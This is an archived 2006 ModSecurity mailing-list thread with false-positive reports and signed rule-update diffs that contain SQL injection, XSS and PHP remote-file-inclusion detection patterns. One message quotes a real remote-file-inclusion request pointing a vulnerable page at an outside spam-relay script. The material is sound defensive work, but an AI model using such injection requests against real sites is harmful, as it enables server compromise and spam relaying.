From gerard at whitecurve.com Wed Oct 4 04:21:50 2006 From: gerard at whitecurve.com (Gerard Earley) Date: Wed, 04 Oct 2006 09:21:50 +0100 Subject: [Modsecurity] special phpBB false positive Message-ID: <45236F1E.6090602@whitecurve.com> I'm getting a lots of false positives with users posting to phpBB from rule 300016, which is the generic SQL injection rule. The real problem is that the clients company name has the word "union" in it. Is there a way to check the whether the a particular word is used with union and if its there to NOT trigger the rule. For example "blah blah blah union blah blah blah" would trigger the rule but "blah blah blah keyword union blah blah blah" would not. Any hints? -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 3303 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.gotroot.com/pipermail/modsecurity/attachments/20061004/c6e2ba9f/attachment.bin From mike at gotroot.com Mon Oct 9 11:43:07 2006 From: mike at gotroot.com (Michael Shinn) Date: Mon, 09 Oct 2006 11:43:07 -0400 Subject: [Modsecurity] special phpBB false positive In-Reply-To: <45236F1E.6090602@whitecurve.com> References: <45236F1E.6090602@whitecurve.com> Message-ID: <452A6E0B.9010301@gotroot.com> Thanks for the report, and sorry to hear that you are having problems. Would it be possible to look at your audit_log entries for these events? If so, I could put together an exclusion to prevent this false positive. Gerard Earley wrote: > I'm getting a lots of false positives with users posting to phpBB from > rule 300016, which is the generic SQL injection rule. The real problem > is that the clients company name has the word "union" in it. > > Is there a way to check the whether the a particular word is used with > union and if its there to NOT trigger the rule. > > For example > "blah blah blah union blah blah blah" > would trigger the rule but > "blah blah blah keyword union blah blah blah" > would not. > > Any hints? > ------------------------------------------------------------------------ > > _______________________________________________ > Modsecurity mailing list > Modsecurity at gotroot.com > http://lists.gotroot.com/mailman/listinfo/modsecurity > From zeki at zeki.ch Tue Oct 10 07:40:45 2006 From: zeki at zeki.ch (Zekeria Oezdemir) Date: Tue, 10 Oct 2006 13:40:45 +0200 Subject: [Modsecurity] gallery 1.5.4 false positive Message-ID: <452B86BD.5080406@zeki.ch> hello list, i get this error on Gallery v1.5.4 [Tue Oct 10 13:30:38 2006] [error] [client x.x.x.x] mod_security: Access denied with code 500. Pattern match "\\\\.php(3|4|5)?(\\\\?|&).*=(ht|f)tps?:/.*(\\\\?|&)" at REQUEST_URI [id "300018"] [rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"] [hostname "www.domain.ch"] [uri "/pics/do_command.php?return=http%3A%2F%2Fwww.domain.ch%2Fpics%2Fview_album.php&cmd=new-album"] [Tue Oct 10 13:30:52 2006] [error] [client x.x.x.x] mod_security: Access denied with code 500. Pattern match "\\\\.php(3|4|5)?(\\\\?|&).*=(ht|f)tps?:/.*(\\\\?|&)" at REQUEST_URI [id "300018"] [rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"] [hostname "www.domain.ch"] [uri "/pics/do_command.php?return=http%3A%2F%2Fwww.domain.ch%2Fpics%2Fview_album.php&cmd=new-album"] its a bug? greets zeki From mike at gotroot.com Tue Oct 10 13:31:30 2006 From: mike at gotroot.com (Michael Shinn) Date: Tue, 10 Oct 2006 13:31:30 -0400 Subject: [Modsecurity] gallery 1.5.4 false positive In-Reply-To: <452B86BD.5080406@zeki.ch> References: <452B86BD.5080406@zeki.ch> Message-ID: <1160501490.3726.20.camel@localhost.localdomain> Thanks for the report, yep its a bug. Putting out a fix now, should have it up in a jiffy. On Tue, 2006-10-10 at 13:40 +0200, Zekeria Oezdemir wrote: > hello list, > > i get this error on Gallery v1.5.4 > > > [Tue Oct 10 13:30:38 2006] [error] [client x.x.x.x] mod_security: Access > denied with code 500. Pattern match > "\\\\.php(3|4|5)?(\\\\?|&).*=(ht|f)tps?:/.*(\\\\?|&)" at REQUEST_URI [id > "300018"] [rev "1"] [msg "Generic PHP code injection protection"] > [severity "CRITICAL"] [hostname "www.domain.ch"] [uri > "/pics/do_command.php?return=http%3A%2F%2Fwww.domain.ch%2Fpics%2Fview_album.php&cmd=new-album"] > [Tue Oct 10 13:30:52 2006] [error] [client x.x.x.x] mod_security: Access > denied with code 500. Pattern match > "\\\\.php(3|4|5)?(\\\\?|&).*=(ht|f)tps?:/.*(\\\\?|&)" at REQUEST_URI [id > "300018"] [rev "1"] [msg "Generic PHP code injection protection"] > [severity "CRITICAL"] [hostname "www.domain.ch"] [uri > "/pics/do_command.php?return=http%3A%2F%2Fwww.domain.ch%2Fpics%2Fview_album.php&cmd=new-album"] > > > its a bug? > > greets > zeki > _______________________________________________ > Modsecurity mailing list > Modsecurity at gotroot.com > http://lists.gotroot.com/mailman/listinfo/modsecurity -- Michael T. Shinn KeyID:0xDAE2EC86 Key Fingerprint: 1884 E657 A6DF DF1B BFB9 E2C5 DCC6 5297 DAE2 EC86 http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xDAE2EC86 Got Root? http://www.gotroot.com modsecurity rules: http://www.modsecurityrules.com Troubleshooting Firewalls: http://troubleshootingfirewalls.com From mirror at prometheus-group.com Tue Oct 10 13:33:06 2006 From: mirror at prometheus-group.com (mirror at prometheus-group.com) Date: 10 Oct 2006 13:33:06 -0400 Subject: [Modsecurity] Modsecurity rules update for 20061010 Message-ID: <20061010173306.16281.qmail@plesk.shinn.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 New Release of GotRoot Web Signatures Diff of /etc/modsecurity/apache2-rules.conf Diff of /etc/modsecurity/blacklist.conf Diff of /etc/modsecurity/proxy.conf Diff of /etc/modsecurity/rules.conf 7c7 < # Version: N-20061010-01 - --- > # Version: N-20061009-01 182c182 < SecFilterSelective REQUEST_URI "!(/tiki-objectpermissions|aardvarkts/install/index|/do_command|banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main|ad-?server/adjs)" "chain,id:300018,rev:2,severity:2,msg:'Generic PHP code injection protection'" - --- > SecFilterSelective REQUEST_URI "!(/tiki-objectpermissions|aardvarkts/install/index|/gallery/do_command|banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main|ad-?server/adjs)" "chain,id:300018,rev:1,severity:2,msg:'Generic PHP code injection protection'" 190c190 < SecFilterSelective REQUEST_URI "!(/do_command))" chain - --- > SecFilterSelective REQUEST_URI "!((galler(y|i)/do_command))" chain Diff of /etc/modsecurity/blacklist2.conf Diff of /etc/modsecurity/exclude.conf Diff of /etc/modsecurity/rootkits.conf Diff of /etc/modsecurity/useragents.conf Diff of /etc/modsecurity/exclude.conf Diff of /etc/modsecurity/badips.conf Diff of /etc/modsecurity/recons.conf Diff of /etc/modsecurity/jitp.conf -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQIVAwUBRSvZUrVvl2Kn6BhaAQLQ6BAA34xr1DPMs91Dm8qZejSCMq4HZFIn0J5l lyo6Y/dTz60hBLOhmuKTT6ijAJpqWCBGmuTZcVu/T0XJCNYPKQsF7jaFpN3eXVIR KTJf+R8bC3BYOu+Uc8SGl4caLG1wIKGe3eV/A4VAZGMHeuzlyPUEL4VQfMh5kbk6 ZJwI1UQJmmV2r3dLO1O0cm1WH/eztoqeszVHTqG+FXhIK/65ABPJuWHFmSGrYd+m H9cZQ1R7ewqoRLEpFNirq4a5SsdltDksfwZRnVNdQTIcwyaiw/HbDbe6JTHzcvSk FtH83Pb5hYRQ3mNxr7YC6YhwhXJBkFW3zzNcqsb1P61VzgAH9bkaNyqPtB1DTpMW 5zY/f1FAkMx2qODcXXvJlgko56jzWc7ADppS4+4DefpUTG60S5GYxTU1WHH1s0oh z/i0ZUHAZ+9E683SL5RZicHevSQkMqyrVhCIAuYFxnv0EX4EIKranmrBQQUxbjlF OYpjg6qFOKzGPFGQit36VigDnbtPIEwuAiF17ULDpqrOU/iaTV/K2BW27thSxhfW q5+6Sn3UGU+55x1Ro6mli31s6pVOP/IlQxdkNMKrc/pk2KsCHU7zPNM9H3c5uR9j w3ZEo3z8hN6b/pDhl3fgoAAWNZ40O9u3+q+HWLe/j2XiWsOapYX0Ac5DT3uZG5kq vufjVOv+UMk= =4RrZ -----END PGP SIGNATURE----- From mirror at prometheus-group.com Tue Oct 10 15:54:46 2006 From: mirror at prometheus-group.com (mirror at prometheus-group.com) Date: 10 Oct 2006 15:54:46 -0400 Subject: [Modsecurity] Modsecurity rules update for 20061010 Message-ID: <20061010195446.12249.qmail@plesk.shinn.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 New Release of GotRoot Web Signatures Diff of /etc/modsecurity/apache2-rules.conf Diff of /etc/modsecurity/blacklist.conf Diff of /etc/modsecurity/proxy.conf Diff of /etc/modsecurity/rules.conf 7c7 < # Version: N-20061010-02 - --- > # Version: N-20061010-01 190c190 < SecFilterSelective REQUEST_URI "!(/do_command)" chain - --- > SecFilterSelective REQUEST_URI "!(/do_command))" chain Diff of /etc/modsecurity/blacklist2.conf Diff of /etc/modsecurity/exclude.conf Diff of /etc/modsecurity/rootkits.conf Diff of /etc/modsecurity/useragents.conf Diff of /etc/modsecurity/exclude.conf Diff of /etc/modsecurity/badips.conf Diff of /etc/modsecurity/recons.conf Diff of /etc/modsecurity/jitp.conf -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQIVAwUBRSv6hrVvl2Kn6BhaAQItqBAAnsuyIcnEZcnLB6pGjZZd98arKeFQKAV6 veeIXBEXvcLQyfVsWGNm4j9HRtGBRe3lRfVuNTR7xNOYN4ZGN36Ru9huFwFjnHG3 5YCqyRS0lIgFhktM2xcylhVdURhIHoVWrZkLTqeMsbCyBpz9IdTkSBWFFa9DuIJ+ 7fV5FrEdRe4t4/lmo6s2OftvvIP4sB+lKIqYazkUrFXzo6Ts1Qj7Avw/6qjbYm9T UVPfhDhigvpV+eagzEDn9TRAWH4WAhCR9keZoe6djVacEdv4LZzxJwS7RZwI3KLm vm/bTYR5Ue2slOdPXx4/jDqwNm1JQrRHyk6KXg/Yb7KxeQ+UlDOV2hKs3C9gkUf+ MmNpAXzr0nL/uD06qcq4Y9/t+EZwG1VKa8SwmxzuX8zm4N0P77vEY4crcqpj62pI wKaF42KbVSn0zVBU7UdyhQ1muzvYvPtIIt1I8NPHZ6606tGjZCcikeLv1vBO60ep is4CWYio9TY26yf60PqyYzUzYhR4zZuvMCExll2whuYuDtjjpXaPYG1VtwXdhNPp r+tPDzYQFLUxPnYMUDWgCeOv2ULOx1ce/Y8HAh7LAWEoKo8X+HeBGgQF8dbc2UNk Y6anfvlahaQhRxfr+WJKTKrntwGu4qo3azWupZgGIfBjccRrYHLxrn6jOXTo9mez Dqu2LVcaDSc= =BtKA -----END PGP SIGNATURE----- From mirror at prometheus-group.com Tue Oct 10 18:42:49 2006 From: mirror at prometheus-group.com (mirror at prometheus-group.com) Date: 10 Oct 2006 18:42:49 -0400 Subject: [Modsecurity] Modsecurity rules update for 20061010 Message-ID: <20061010224249.13985.qmail@plesk.shinn.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 New Release of GotRoot Web Signatures Diff of /etc/modsecurity/apache2-rules.conf Diff of /etc/modsecurity/blacklist.conf Diff of /etc/modsecurity/proxy.conf Diff of /etc/modsecurity/rules.conf Diff of /etc/modsecurity/blacklist2.conf Diff of /etc/modsecurity/exclude.conf Diff of /etc/modsecurity/rootkits.conf Diff of /etc/modsecurity/useragents.conf Diff of /etc/modsecurity/exclude.conf Diff of /etc/modsecurity/badips.conf Diff of /etc/modsecurity/recons.conf Diff of /etc/modsecurity/jitp.conf 4410,4452d4409 < < #Eazy Cart Multiple Vulnerabilities < SecFilterSelective REQUEST_URI "easycart\.php" "chain,id:390154,rev:1,severity:2,msg:'JITP: Eazy Cart SQL injection'" < SecFilterSelective ARG_price "((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|\'|UNION.*SELECT.*FROM)" < SecFilterSelective REQUEST_URI "admin/config/customer\.dat" "id:390155,rev:1,severity:2,msg:'JITP: Eazy Cart Customer Data Access'" < SecFilterSelective REQUEST_URI "easycart\.php" "chain,id:390156,rev:1,severity:2,msg:'JITP: Eazy Cart XSS ATTACK'" < SecFilterSelective ARGS "<[[:space:]]*(script|about|applet|activex|chrome).*(script|about|applet|activex|chrome)[[:space:]]*>" < < #WebYep "webyep_sIncludePath" File Inclusion Vulnerabilities < SecFilterSelective REQUEST_URI "webyep-system/program/((lib|elements)/|webyep\.php)" "chain,id:390157,rev:1,severity:2,msg:'JITP: WebYep webyep_sIncludePath File Inclusion Vulnerabilities'" < SecFilterSelective ARG_webyep_sIncludePath "((ht|f)tps?:/|\.\./\.\.)" < < #Travelsized CMS "setup_folder" File Inclusion Vulnerability < SecFilterSelective REQUEST_URI "frontpage\.php" "chain,id:390158,rev:1,severity:2,msg:'JITP: Travelsized CMS setup_folder File Inclusion Vulnerabilities'" < SecFilterSelective ARG_setup_folder "((ht|f)tps?:/|\.\./\.\.)" < < #VideoDB "config[pdf_module]" File Inclusion Vulnerability < SecFilterSelective REQUEST_URI "core/pdf\.php" "chain,id:390159,rev:1,severity:2,msg:'JITP: VideoDB File Inclusion Vulnerabilities'" < SecFilterSelective REQUEST_URI "config\[pdf_module\].*((ht|f)tps?:/|\.\./\.\.)" < < #AllMyGuests "_AMGconfig[cfg_serverpath]" File Inclusion < SecFilterSelective REQUEST_URI "signin\.php" "chain,id:390160,rev:1,severity:2,msg:'JITP: AllMyGuests File Inclusion Vulnerabilities'" < SecFilterSelective REQUEST_URI "_AMGconfig\[cfg_serverpath\].*((ht|f)tps?:/|\.\./\.\.)" < < #OpenBiblio Local File Inclusion and SQL Injection < SecFilterSelective REQUEST_URI "shared/(header|help)\.php" "chain,id:390161,rev:1,severity:2,msg:'JITP: OpenBiblio File Inclusion Vulnerabilities'" < SecFilterSelective ARGS "(((ht|f)tps?:/|\.\./\.\.)|((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|\'|UNION.*SELECT.*FROM))" < < #BasiliX "BSX_LIBDIR" File Inclusion Vulnerabilities < SecFilterSelective REQUEST_URI "\.php" "chain,id:390162,rev:1,severity:2,msg:'JITP: BasiliX BSX_LIBDIR File Inclusion Vulnerabilities'" < SecFilterSelective ARG_BSX_LIBDIR "((ht|f)tps?:/|\.\./\.\.)" < < #PowerPortal "file_name[]" File Inclusion Vulnerability < SecFilterSelective REQUEST_URI "index\.php" "chain,id:390163,rev:1,severity:2,msg:'JITP: Powerportal File Inclusion Vulnerabilities'" < SecFilterSelective REQUEST_URI "file_name\[\].*((ht|f)tps?:/|\.\./\.\.)" < < #DeluxeBB "templatefolder" File Inclusion Vulnerability < SecFilterSelective REQUEST_URI "/templates/.*/.*/.*\.php" "chain,id:390164,rev:1,severity:2,msg:'JITP: DeluxeBB teplatefolder File Inclusion Vulnerabilities'" < SecFilterSelective ARG_templatefolder "((ht|f)tps?:/|\.\./\.\.)" < < #TagIt! Tagboard "page" File Inclusion Vulnerability < SecFilterSelective REQUEST_URI "/index\.php" "chain,id:390165,rev:1,severity:2,msg:'JITP: Tagit page File Inclusion Vulnerabilities'" < SecFilterSelective ARG_page "(ht|f)tps?:/" -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQIVAwUBRSwh6bVvl2Kn6BhaAQKUmRAAgZ0M75l7VZgI4buCm1r0EVJozuzFTsO3 kb/PeSfNihZz3aMsPmzqk1a9Ur34V1p6lQooRgmoXlT//wflnVfAmRRy2qobpo4w ZpTtS2GNk6mdW5NdcgcWbu0H/NA6wC+M0cl1Xyiu7d2lMm/QFAqIEagp66wJX8fp n++du8IAE+ALyh5fKymzgaoCTQyego+soJVItq/R6n5XrPqcKcebVUwAV4DDB3JF OdWBBfeE1/Lw5qbV5P9qK8MLa20NBJBTXK6aY+m+feiaMJTQspt8Jm3nu3ZB2Jey O/xtziQTai1O9SbfT9MM1etOd8xHVVXqD+pwAdLwf91aEPLJ7J4CxdpBR0aUtzoF brLcNwlDcNosnO4+X32WdYXHHm+1ehJPhnFQz7zc0C+fW/jMxEjAq4/5/NMxZHzD WzBvKTTUvv0gLZzcuKEOPwVX1O0JQF5/YBMno7wPWaY4vTss0xY+O5OFR2dq5xgw uNn3EAQKyeeFOms0h1oDijTa9EdOMnYoY0Jl5FpnHvr4sFYpS180FeP9WaU+OByS gw+I9CAiFxgFzzkE8V8Wcu9LVbq7wqjaN4o/OSWU3Te3OE/P1kDaTrD6rUnJCYSZ xztxNQhbOI8HDN6909BZnPbcf6FOla03n5TAnjZcccvhH2TU91t9fGlRjoNsHtP2 Xd4dJCAf6FA= =d5mZ -----END PGP SIGNATURE----- From mirror at prometheus-group.com Tue Oct 10 18:45:05 2006 From: mirror at prometheus-group.com (mirror at prometheus-group.com) Date: 10 Oct 2006 18:45:05 -0400 Subject: [Modsecurity] Modsecurity rules update for 20061010 Message-ID: <20061010224505.30565.qmail@plesk.shinn.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 New Release of GotRoot Web Signatures Diff of /etc/modsecurity/apache2-rules.conf Diff of /etc/modsecurity/blacklist.conf Diff of /etc/modsecurity/proxy.conf Diff of /etc/modsecurity/rules.conf Diff of /etc/modsecurity/blacklist2.conf 13c13 < # Version: N-20061010-01 - --- > # Version: N-20061008-02 34d33 < SecFilterSelective THE_REQUEST "(\.|/)elektroteh\.com/" Diff of /etc/modsecurity/exclude.conf Diff of /etc/modsecurity/rootkits.conf Diff of /etc/modsecurity/useragents.conf Diff of /etc/modsecurity/exclude.conf Diff of /etc/modsecurity/badips.conf Diff of /etc/modsecurity/recons.conf Diff of /etc/modsecurity/jitp.conf 5c5 < # Version: N-20061010-01 - --- > # Version: N-20061005-01 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQIVAwUBRSwicLVvl2Kn6BhaAQIcZw/+KjbQ67luNKERimoEF4AL4zbOwKwVUjEF CDFfjD9MhAQzWOA+vwfJp0i7B+t/tK025fkEt/HRgqH3GnqSXriqcPoc+FZh+kri /uLuG5PjTedeI1Os1X0+Tg0vpPEFnb2SDk7Mbxck6uAuAf+scuQUn3GBM4hMDEMU MQviKIlOmTwbfku9oz4dlfQgtc0osftkfqomvuAXCn6i0BpjiBDG3fvw14pKinwB xVkvLSbhC+/pKm2L7T1TqxBIArCIV7vFkMtlF765p9aHNHB5K+1kqDtDVpOACWlw 4wuh3vNfmoG5Gf+Dc4iHIzlpMtH3+KcgwkSSS+Ef34iIt07Oh7B90z6ciaacm8d1 Oe23wcJvfZQz6Al3IrLnKsytKNGB9fTRoN4jHGi8m6+wLkXInoLLQs0cxxiPN1nh QveOtXoHUSFjR6GY0YTscjjh5p4f9vSVrKU4iQ4aCrr+gCKGv8gjsnIMSTrnYi9V UhnnkGef7jKnJmUQd86/oHSdM4BX91SSZhOg+cH+vg6FTHWY70/90XzQgJnU9Mul DlnscfWDKx2d4HBVKfE5AB5G/TLTapDQvv9OYZGFj1vmbU/kQx6Cq+QohSUJ7M0m fxM1P0Ab+Gk52PAH6THlzX0U4tJSfsx0CfohgHQOerIDsWpZKOYdUcfHOqzewER+ nqkoCLifhKo= =gPNK -----END PGP SIGNATURE----- From lists at 323inc.com Fri Oct 13 15:59:26 2006 From: lists at 323inc.com (MIKE YRABEDRA) Date: Fri, 13 Oct 2006 15:59:26 -0400 Subject: [Modsecurity] Spam injection, very sneeky Message-ID: Hey folks, I have been using modsec to block all sorts of spam injection, but I have found a new one. I have a client that has a blanket style pages that includes anyhting sent to it. Like so... So if someone does this... http://www.somesite.com/folder/index.php?content=http://home.arcor.de/dumpxp l/mail.php? ..bad things happen. In my case over 100k of spam being relayed by my server. I caught this guy using modsec and searching ARGS with the same text as in the spam. This is OK for now, until he uses a different spam. The php script that did the damage can be seen here... http://home.arcor.de/dumpxpl/mail.php Is there a modsec rule that will prevent this sort of thing? TIA -- Mike Yrabedra B^)> From michal at sabren.com Fri Oct 13 17:11:47 2006 From: michal at sabren.com (Michal Wallace) Date: Fri, 13 Oct 2006 17:11:47 -0400 (EDT) Subject: [Modsecurity] Spam injection, very sneeky In-Reply-To: References: Message-ID: On Fri, 13 Oct 2006, MIKE YRABEDRA wrote: > I have been using modsec to block all sorts of spam injection, but I have > found a new one. > > I have a client that has a blanket style pages that includes anyhting sent > to it. Like so... > > > > So if someone does this... > > http://www.somesite.com/folder/index.php?content=http://home.arcor.de/dumpxp > l/mail.php? > > ..bad things happen. In my case over 100k of spam being relayed by my > server. > > I caught this guy using modsec and searching ARGS with the same text as in > the spam. This is OK for now, until he uses a different spam. > > > The php script that did the damage can be seen here... > http://home.arcor.de/dumpxpl/mail.php > > Is there a modsec rule that will prevent this sort of thing? Hey Mike, PHP's remote include "feature" is wrong on so many levels. One thing you can do in this case is have the client sanitize the $content variable so it doesn't do this. There's usually no reason it has to have the http:// in there, and if there is, you can limit it to the sites he actually wants to use. Or he could just fetch the url and print the contents, rather than using include(). Or you could patch PHP so it doesn't let this happen: http://www.hardened-php.net/ At the very least, you should scan for http:// in the args. I'm surprised the gotroot rules didn't catch this. I'm pretty sure there was a rule that did this already for any php file. Sincerely, Michal J Wallace Sabren Enterprises, Inc. ------------------------------------- contact: michal at sabren.com hosting: http://www.cornerhost.com/ my site: http://www.withoutane.com/ ------------------------------------- From mike at gotroot.com Fri Oct 13 23:18:31 2006 From: mike at gotroot.com (Michael Shinn) Date: Fri, 13 Oct 2006 23:18:31 -0400 Subject: [Modsecurity] Spam injection, very sneeky In-Reply-To: References: Message-ID: <1160795911.4119.10.camel@localhost.localdomain> Thank you all for the report. The generic sigs should have caught this, but I'm never happy with a should, so I just tuned this sig to make it even broader in case I missed something (please let me know about all false positives). I just added another rule to catch any other variations of this I might have missed. To that end, if anyone sees rule 300040 fire (ever!) please let me know and send me your audit_log entries. This should catch the exception that I just can't presently imagine, and I always appreciate new opportunities to make the sigs better. Thank you again for the report, please keep them coming as I'm always happy to make more sigs. :-) New release coming out in a few minutes. On Fri, 2006-10-13 at 17:11 -0400, Michal Wallace wrote: > On Fri, 13 Oct 2006, MIKE YRABEDRA wrote: > > > I have been using modsec to block all sorts of spam injection, but I have > > found a new one. > > > > I have a client that has a blanket style pages that includes anyhting sent > > to it. Like so... > > > > > > > > So if someone does this... > > > > http://www.somesite.com/folder/index.php?content=http://home.arcor.de/dumpxp > > l/mail.php? > > > > ..bad things happen. In my case over 100k of spam being relayed by my > > server. > > > > I caught this guy using modsec and searching ARGS with the same text as in > > the spam. This is OK for now, until he uses a different spam. > > > > > > The php script that did the damage can be seen here... > > http://home.arcor.de/dumpxpl/mail.php > > > > Is there a modsec rule that will prevent this sort of thing? > > Hey Mike, > > PHP's remote include "feature" is wrong > on so many levels. One thing you can do in > this case is have the client sanitize the > $content variable so it doesn't do this. > There's usually no reason it has to have > the http:// in there, and if there is, > you can limit it to the sites he actually > wants to use. > > Or he could just fetch the url and print > the contents, rather than using include(). > > Or you could patch PHP so it doesn't let > this happen: > > http://www.hardened-php.net/ > > At the very least, you should scan for > http:// in the args. I'm surprised the gotroot > rules didn't catch this. I'm pretty sure > there was a rule that did this already for > any php file. > > Sincerely, > > Michal J Wallace > Sabren Enterprises, Inc. > ------------------------------------- > contact: michal at sabren.com > hosting: http://www.cornerhost.com/ > my site: http://www.withoutane.com/ > ------------------------------------- > > _______________________________________________ > Modsecurity mailing list > Modsecurity at gotroot.com > http://lists.gotroot.com/mailman/listinfo/modsecurity -- Michael T. Shinn KeyID:0xDAE2EC86 Key Fingerprint: 1884 E657 A6DF DF1B BFB9 E2C5 DCC6 5297 DAE2 EC86 http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xDAE2EC86 Got Root? http://www.gotroot.com modsecurity rules: http://www.modsecurityrules.com Troubleshooting Firewalls: http://troubleshootingfirewalls.com From mirror at prometheus-group.com Fri Oct 13 23:20:42 2006 From: mirror at prometheus-group.com (mirror at prometheus-group.com) Date: 13 Oct 2006 23:20:42 -0400 Subject: [Modsecurity] Modsecurity rules update for 20061013 Message-ID: <20061014032042.5444.qmail@plesk.shinn.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 New Release of GotRoot Web Signatures Diff of /etc/modsecurity/apache2-rules.conf Diff of /etc/modsecurity/blacklist.conf Diff of /etc/modsecurity/proxy.conf Diff of /etc/modsecurity/rules.conf 7c7 < # Version: N-20061013-02 - --- > # Version: N-20061010-02 174c174 < #Generic PHP remote file inclusion attack signature with command - --- > #Generic PHP remote file inclusion attack signature 181,186c181,183 < SecFilterSelective REQUEST_URI "!(/tiki-objectpermissions|aardvarkts/install/index|/do_command|banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main|ad-?server/adjs)" "chain,id:300018,rev:3,severity:2,msg:'Generic PHP code injection protection via ARGS'" < SecFilterSelective REQUEST_URI "\.php(3|4|5)?(\?|&)" chain < SecFilterSelective ARGS "(ht|f)tps?:/" < SecFilterSelective REQUEST_URI "!(/tiki-objectpermissions|aardvarkts/install/index|/do_command|banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main|ad-?server/adjs)" "chain,id:300040,rev:1,severity:2,msg:'Generic PHP code injection protection in URI'" < SecFilterSelective REQUEST_URI "\.php(3|4|5)?(\?|&).*=(ht|f)tps?:/" < - --- > #MTS > SecFilterSelective REQUEST_URI "!(/tiki-objectpermissions|aardvarkts/install/index|/do_command|banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main|ad-?server/adjs)" "chain,id:300018,rev:2,severity:2,msg:'Generic PHP code injection protection'" > SecFilterSelective REQUEST_URI "\.php(3|4|5)?(\?|&).*=(ht|f)tps?:/.*(\?|&)" Diff of /etc/modsecurity/blacklist2.conf 124c124 < #SecFilterSelective THE_REQUEST "home\.arcor\.de" - --- > SecFilterSelective THE_REQUEST "home\.arcor\.de" Diff of /etc/modsecurity/exclude.conf Diff of /etc/modsecurity/rootkits.conf Diff of /etc/modsecurity/useragents.conf Diff of /etc/modsecurity/exclude.conf Diff of /etc/modsecurity/badips.conf Diff of /etc/modsecurity/recons.conf Diff of /etc/modsecurity/jitp.conf -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQIVAwUBRTBXirVvl2Kn6BhaAQLMlQ/9GOFgzJqg2UPzJp/b1E3zrvwVjPUaLORA yHyuZUJywIxGtd6h1iaI2UnoLhhBFsURKY3NQKV9DJFZT5uN01FshssAOV/3SP1P DxiTc3jor+MdaRzAReoRcGbnXPZnax4cqHMDcaT4fqxglvheeYosrh/XXcleAOH5 iwVjTPir6/dILZ2lRwWI+DIuRY6Blwiy8NGKanwXc1NDcon4LGsSHH49dQBqWi3c cOxpPeojvDbTVDyXK63c6ojoe0qBUuZuVRYwjydTrV7gqysB5omxXPrjb5wwJ3JV 5Z1vMC5M1x2x4rPAxN5WdChoaGVTBhX96BNKh9kfQJDYNZ1QGqNgN/8RJSsfWrkH y7AWiQgjEgEdXYS2m91i7FEHreQPvKiHxfiBeMe65fm9NI/zQKsGTxt6gXFGDDjK U+I5ZNREDlhUpIgjfwTHNvfI4n76EqnJXDUoDtTSTYnH2Ks4/Kvd5HQV5siZuqzI sq/9m0VBvA/Mwuvxpsu5qxkRKHmHQLMZE6BkFtQDmgAKWZG3kLrhnOLXFoU6tVei iYRmdDWf3UT5/sgDoyC3+X7DHB84PycNBqZ/gRmLPsR26H4VGBZdGvt4WgS1Iabo Gp+4OVvoXtcdIcFL18B7tCdul58EQ6wnBhxnknPVxDixO47tYGbALY022MXrB1lz 7g/g709z8RA= =DnPJ -----END PGP SIGNATURE----- From mirror at prometheus-group.com Fri Oct 13 23:21:52 2006 From: mirror at prometheus-group.com (mirror at prometheus-group.com) Date: 13 Oct 2006 23:21:52 -0400 Subject: [Modsecurity] Modsecurity rules update for 20061013 Message-ID: <20061014032152.24766.qmail@plesk.shinn.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 New Release of GotRoot Web Signatures Diff of /etc/modsecurity/apache2-rules.conf Diff of /etc/modsecurity/blacklist.conf Diff of /etc/modsecurity/proxy.conf Diff of /etc/modsecurity/rules.conf Diff of /etc/modsecurity/blacklist2.conf 124c124 < SecFilterSelective THE_REQUEST "home\.arcor\.de" - --- > #SecFilterSelective THE_REQUEST "home\.arcor\.de" Diff of /etc/modsecurity/exclude.conf Diff of /etc/modsecurity/rootkits.conf Diff of /etc/modsecurity/useragents.conf Diff of /etc/modsecurity/exclude.conf Diff of /etc/modsecurity/badips.conf Diff of /etc/modsecurity/recons.conf Diff of /etc/modsecurity/jitp.conf -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQIVAwUBRTBX0LVvl2Kn6BhaAQLSxA/9FCjvHIlmNmgW4FOKEZfkt7zk0+a00mjO LeLBbWfscVB6E8kghkSHkUIXst1ffJZczRfUGQW8/k2yUenGdmmybpSANjQMffGA XnCSmn1e0CEJnYS1eKpD5/aA4S91uq9nEqMWWIVrJ2ViKepksbwLJ/xZ4p9hQe0I vh5KmnMHrgKaps6Q8n5b9G17NTKTimBc0LiKGRAHq//yH082II89sSM+0X/GsyVd QJmqWbjjJHDCz86e6loUTx1yrrwBVmhrUDZ/bD3nJgznfX3VS1NJ1e0DnYK/mbO6 5izzZcnxg4WiWnwxG36FbYH5GJRmy+3Y2bccKejIeFcWkOJAxSzYomEzsjmIDVrI 